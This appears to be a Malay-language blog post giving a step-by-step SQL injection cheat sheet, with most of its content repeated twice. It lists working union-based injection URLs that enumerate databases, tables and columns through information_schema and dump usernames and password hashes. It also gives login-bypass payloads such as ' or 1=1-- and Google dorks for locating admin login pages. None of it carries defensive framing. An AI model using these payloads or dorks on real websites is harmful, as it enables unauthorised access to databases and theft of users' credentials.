1. index.php?id=4 (asal)
2. index.php?id=4' (ada error/bug sql)
3. index.php?id=4+and+1=1-- (nilai true)( tanda + sama jgk dengan %20 pada url address iaitu jarak)
4. index.php?id=4+and+1=2-- (false,tiada paparan)
5. index.php?id=4+order+by+5-- (cari berapa banyak column)(contohnya ada 5 column)
6. index.php?id=4+union+select+1,2,3,4,5-- (cari column yang boleh di inject)(tiada perubahan)
7. index.php?id=-4+union+select+1,2,3,4,5-- (paparan nombor)(contoh terdapat paparan nombor 2 dan 3 iaitu column yang mempunyai bug)
8. index.php?id=-4+union+select+1,database(),3,4,5-- (lihat database)(gantikan pada nombor 2 atau 3)
9. index.php?id=-4+union+select+1,concat(user(),0x3a,database()),version(),4,5-- (alternatif untuk lihat sekaligus)(0x3a sama jgk : tetapi convert dlm hexa)
10. index.php?id=-4+union+select+1,2,table_name,4,5+from+information_schema.tables
+where+table_schema=database()+limit+0,1-- (dapatkan nama table 1per 1)
11. index.php?id=-4+union+select+1,2,group_concat(table_name),4,5+from
+information_schema.tables+where+table_schema=database()-- (tgk semua table sekaligus)(skip yg no.10 untuk mudah)(contoh table yang dapat ialah table_user)
12. index.php?id=-4+union+select+1,2,column_name,4,5+from+information_schema.columns
+where+table_name=0x7461626c655f75736572+limit+0,1-- (dapatkan nama column)(convert nama table_user ke hexa,awalan tmbah 0x)
13. index.php?id=-4+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns
+where+table_name=0x7461626c655f75736572-- (tgk semua nama column dalam table_user)(contoh dapat user_id dan password_id)
14. index.php?id=-4+union+select+1,database(),concat(user_id,password_id),4,5+from+table_user-- (tgk username dan pass)(perlu crack md5 untuk mendapatkan pass)
15. index.php?id=-4+union+select+1,2,group_concat(user_id,0x3a,password_id),4,5+from+table_user-- (tgk semua username dan pass)
ni untuk versi 5...
beberapa bypass login yg bleh digunakan utk sql injection
'or''='
or 1=1--
" or 1=1--
' or 1=1--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 'x'='x
" or "x"="x
') or ('x'='x
dork =
inurl:/admin/login.asp
inurl:/admin_login.asp
inurl:/admin/admin_login.asp
inurl:/administrator.asp
2. index.php?id=4' (ada error/bug sql)
3. index.php?id=4+and+1=1-- (nilai true)( tanda + sama jgk dengan %20 pada url address iaitu jarak)
4. index.php?id=4+and+1=2-- (false,tiada paparan)
5. index.php?id=4+order+by+5-- (cari berapa banyak column)(contohnya ada 5 column)
6. index.php?id=4+union+select+1,2,3,4,5-- (cari column yang boleh di inject)(tiada perubahan)
7. index.php?id=-4+union+select+1,2,3,4,5-- (paparan nombor)(contoh terdapat paparan nombor 2 dan 3 iaitu column yang mempunyai bug)
8. index.php?id=-4+union+select+1,database(),3,4,5-- (lihat database)(gantikan pada nombor 2 atau 3)
9. index.php?id=-4+union+select+1,concat(user(),0x3a,database()),version(),4,5-- (alternatif untuk lihat sekaligus)(0x3a sama jgk : tetapi convert dlm hexa)
10. index.php?id=-4+union+select+1,2,table_name,4,5+from+information_schema.tables
+where+table_schema=database()+limit+0,1-- (dapatkan nama table 1per 1)
11. index.php?id=-4+union+select+1,2,group_concat(table_name),4,5+from
+information_schema.tables+where+table_schema=database()-- (tgk semua table sekaligus)(skip yg no.10 untuk mudah)(contoh table yang dapat ialah table_user)
12. index.php?id=-4+union+select+1,2,column_name,4,5+from+information_schema.columns
+where+table_name=0x7461626c655f75736572+limit+0,1-- (dapatkan nama column)(convert nama table_user ke hexa,awalan tmbah 0x)
13. index.php?id=-4+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns
+where+table_name=0x7461626c655f75736572-- (tgk semua nama column dalam table_user)(contoh dapat user_id dan password_id)
14. index.php?id=-4+union+select+1,database(),concat(user_id,password_id),4,5+from+table_user-- (tgk username dan pass)(perlu crack md5 untuk mendapatkan pass)
15. index.php?id=-4+union+select+1,2,group_concat(user_id,0x3a,password_id),4,5+from+table_user-- (tgk semua username dan pass)
ni untuk versi 5...
beberapa bypass login yg bleh digunakan utk sql injection
'or''='
or 1=1--
" or 1=1--
' or 1=1--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 'x'='x
" or "x"="x
') or ('x'='x
dork =
inurl:/admin/login.asp
inurl:/admin_login.asp
inurl:/admin/admin_login.asp
inurl:/administrator.asp


![[Most Recent Quotes from www.kitco.com]](http://www.kitconet.com/charts/metals/gold/t24_au_en_usoz_2.gif)
0 comments:
Post a Comment